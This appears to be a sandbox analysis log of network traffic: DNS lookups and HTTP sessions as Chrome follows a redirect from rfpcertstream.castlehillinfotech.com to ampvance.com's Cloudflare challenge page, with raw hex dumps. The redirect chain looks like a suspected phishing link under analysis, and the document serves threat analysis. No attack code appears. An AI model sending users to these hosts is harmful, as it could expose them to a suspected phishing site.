                                                      Mar 5, 2024 14:23:12.239129066 CET1.1.1.1192.168.2.40xbf2aNo error (0)rfpcertstream.castlehillinfotech.com172.105.184.142A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:14.819797993 CET1.1.1.1192.168.2.40x6bd7No error (0)www.google.com142.250.80.36A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:14.820530891 CET1.1.1.1192.168.2.40xa545No error (0)www.google.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:15.710871935 CET1.1.1.1192.168.2.40xe28aNo error (0)ampvance.com104.21.81.229A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:15.710871935 CET1.1.1.1192.168.2.40xe28aNo error (0)ampvance.com172.67.165.105A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:15.729321957 CET1.1.1.1192.168.2.40xfb7fNo error (0)ampvance.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:16.516021013 CET1.1.1.1192.168.2.40x1341No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.259318113 CET1.1.1.1192.168.2.40x624No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.259318113 CET1.1.1.1192.168.2.40x624No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.260005951 CET1.1.1.1192.168.2.40x7d53No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.838857889 CET1.1.1.1192.168.2.40x6840No error (0)ampvance.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.839296103 CET1.1.1.1192.168.2.40x5977No error (0)ampvance.com172.67.165.105A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.839296103 CET1.1.1.1192.168.2.40x5977No error (0)ampvance.com104.21.81.229A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.846118927 CET1.1.1.1192.168.2.40xaa77No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.846118927 CET1.1.1.1192.168.2.40xaa77No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.846155882 CET1.1.1.1192.168.2.40x5655No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:18.911571026 CET1.1.1.1192.168.2.40xc65dNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:18.911571026 CET1.1.1.1192.168.2.40xc65dNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:18.912920952 CET1.1.1.1192.168.2.40xba6cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:28.111809015 CET1.1.1.1192.168.2.40x9e0dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Mar 5, 2024 14:23:28.111809015 CET1.1.1.1192.168.2.40x9e0dNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:41.365700960 CET1.1.1.1192.168.2.40x448No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Mar 5, 2024 14:23:41.365700960 CET1.1.1.1192.168.2.40x448No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:03.429153919 CET1.1.1.1192.168.2.40x8aadNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Mar 5, 2024 14:24:03.429153919 CET1.1.1.1192.168.2.40x8aadNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:16.253685951 CET1.1.1.1192.168.2.40xfb8bNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                      • rfpcertstream.castlehillinfotech.com
                                                      • https:
                                                        • ampvance.com
                                                        • challenges.cloudflare.com
                                                      • fs.microsoft.com
                                                      • a.nel.cloudflare.com
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449735172.105.184.1424434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:12 UTC696OUTGET /satin/x4/cg1-b1m/ HTTP/1.1
                                                      Host: rfpcertstream.castlehillinfotech.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:13 UTC409INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:13 GMT
                                                      Server: Apache
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      refresh: 2;url=https://ampvance.com
                                                      Set-Cookie: PHPSESSID=lqpseg7htprg0stg76l4v79n72; path=/
                                                      Upgrade: h2
                                                      Connection: Upgrade, close
                                                      Vary: Accept-Encoding
                                                      Transfer-Encoding: chunked
                                                      Content-Type: text/html; charset=UTF-8
                                                      2024-03-05 13:23:13 UTC84INData Raw: 34 39 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 26 26 28 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 70 6c 69 74 28 22 23 22 29 5b 30 5d 29 3c 2f 73 63 72 69 70 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 49<script>location.hash&&(location.href=location.href.split("#")[0])</scrip0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449734172.105.184.1424434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:13 UTC691OUTGET /favicon.ico HTTP/1.1
                                                      Host: rfpcertstream.castlehillinfotech.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: PHPSESSID=lqpseg7htprg0stg76l4v79n72
                                                      2024-03-05 13:23:13 UTC164INHTTP/1.1 404 Not Found
                                                      Date: Tue, 05 Mar 2024 13:23:13 GMT
                                                      Server: Apache
                                                      Content-Length: 283
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      2024-03-05 13:23:13 UTC283INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 72 66 70 63 65 72 74 73 74 72 65 61 6d 2e 63 61 73 74 6c 65 68 69 6c 6c 69 6e 66 6f 74 65 63 68 2e 63 6f 6d 20 50 6f 72 74 20 34
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at rfpcertstream.castlehillinfotech.com Port 4


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.44973923.51.58.94443
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:15 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: fs.microsoft.com
                                                      2024-03-05 13:23:15 UTC494INHTTP/1.1 200 OK
                                                      ApiVersion: Distribute 1.1
                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                      Content-Type: application/octet-stream
                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                      Server: ECAcc (chd/073D)
                                                      X-CID: 11
                                                      X-Ms-ApiVersion: Distribute 1.2
                                                      X-Ms-Region: prod-eus-z1
                                                      Cache-Control: public, max-age=21746
                                                      Date: Tue, 05 Mar 2024 13:23:15 GMT
                                                      Connection: close
                                                      X-CID: 2


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449741104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:15 UTC697OUTGET / HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-Dest: document
                                                      Referer: https://rfpcertstream.castlehillinfotech.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:16 UTC1290INHTTP/1.1 403 Forbidden
                                                      Date: Tue, 05 Mar 2024 13:23:16 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 16113
                                                      Connection: close
                                                      Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Resource-Policy: same-origin
                                                      Origin-Agent-Cluster: ?1
                                                      Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      Referrer-Policy: same-origin
                                                      X-Frame-Options: SAMEORIGIN
                                                      cf-mitigated: challenge
                                                      cf-chl-out: lgcyJ+mAKWDwMhDhG49DFK9slm754FLc9x77MV8wu8jF8ZXyTl8/mcppkR2WvbiFdeSGwK7lknpMPQV7B1yam7TsNR8HX3TY0oWnFON3AJ6u2ltCQVNDUu4q18IgMuot2ruPT4wEhFhCrq3FGTnYwQ==$1M79hhShicXO2BG2nrjEqA==
                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      2024-03-05 13:23:16 UTC401INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 32 6d 66 38 78 61 5a 6b 5a 4b 6a 73 4f 66 4b 32 75 6c 57 39 41 45 30 61 4b 51 6b 7a 52 64 77 4d 4b 35 6c 64 49 54 45 32 4e 38 58 54 42 25 32 42 38 6b 36 6d 47 71 73 72 72 58 6f 6b 6b 6c 47 42 63 4e 6e 4a 75 6a 37 4f 76 79 49 77 72 58 59 6e 6e 45 31 62 79 6d 25 32 42 6b 6e 57 78 65 38 62 43 46 6e 6f 70 34 4b 54 6d 79 47 6f 65 6f 72 37 50 4e 36 58 57 56 66 4a 61 63 32 58 77 77 53 4f 61 70 59 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c
                                                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2mf8xaZkZKjsOfK2ulW9AE0aKQkzRdwMK5ldITE2N8XTB%2B8k6mGqsrrXokklGBcNnJuj7OvyIwrXYnnE1bym%2BknWxe8bCFnop4KTmyGoeor7PN6XWVfJac2XwwSOapY%3D"}],"group":"cf-nel","max_age":604800}NEL
                                                      2024-03-05 13:23:16 UTC1047INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                      Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75
                                                      Data Ascii: mciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAu
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 64 79 2e 64 61 72 6b 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 64 61 72 6b 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62
                                                      Data Ascii: dy.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ib
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 66 63 35 37 34 61 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 6c 69 67 68 74 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 6c 69 67 68 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f
                                                      Data Ascii: div{border-color:#595959 transparent transparent}body.light .font-red{color:#fc574a}body.light .big-button,body.light .pow-button{background-color:#003681;border-color:#003681;color:#fff}body.light #challenge-success-text{background-image:url(data:image/
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70
                                                      Data Ascii: ecoration:none;transition:color .15s ease}a:hover{color:#ee730a;text-decoration:underline}.main-content{margin:8rem auto;max-width:60rem;width:100%}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72
                                                      Data Ascii: jY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{backgr
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64
                                                      Data Ascii: th:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 22 3e 45 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 61 6e 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f 6e 74 69 6e
                                                      Data Ascii: http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to contin
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 53 73 4a 4f 71 69 6c 38 52 69 6e 59 7a 32 32 78 65 4a 36 53 55 55 32 46 42 39 6e 75 6f 67 63 4c 4c 51 66 42 78 30 6a 62 63 6b 6b 47 53 37 58 37 42 71 74 68 4b 6b 49 63 53 4b 4b 4d 65 69 4d 53 66 79 39 62 30 6e 50 31 4e 65 47 68 33 4d 64 73 78 69 6b 42 39 76 4c 65 2e 41 4b 58 66 65 66 69 34 79 45 79 72 59 48 73 61 52 65 30 4a 4a 4c 44 35 5f 35 74 44 79 47 79 42 4c 4a 31 70 59 50 36 58 74 69 52 4d 37 53 69 75 68 58 79 36 77 6d 73 72 51 67 36 68 4f 6f 31 2e 63 30 6c 75 37 6d 5f 72 6b 4a 38 43 67 31 4c 59 4b 6c 62 6b 4e 78 44 50 71 52 6a 74 76 34 31 4b 74 67 78 74 46 4a 2e 4d 4a 48 50 64 46 42 63 2e 69 6a 6c 67 52 61 5f 4e 59 6b 51 6c 75 6b 72 49 34 76 4b 72 6d 47 53 78 35 6a 64 5a 44 4f 52 31 4b 70 5f 32 4d 46 56 4a 32 51 63 32 45 72 5f 49 5a 64 42 79 74 52
                                                      Data Ascii: SsJOqil8RinYz22xeJ6SUU2FB9nuogcLLQfBx0jbckkGS7X7BqthKkIcSKKMeiMSfy9b0nP1NeGh3MdsxikB9vLe.AKXfefi4yEyrYHsaRe0JJLD5_5tDyGyBLJ1pYP6XtiRM7SiuhXy6wmsrQg6hOo1.c0lu7m_rkJ8Cg1LYKlbkNxDPqRjtv41KtgxtFJ.MJHPdFBc.ijlgRa_NYkQlukrI4vKrmGSx5jdZDOR1Kp_2MFVJ2Qc2Er_IZdBytR


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.44974223.51.58.94443
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:16 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
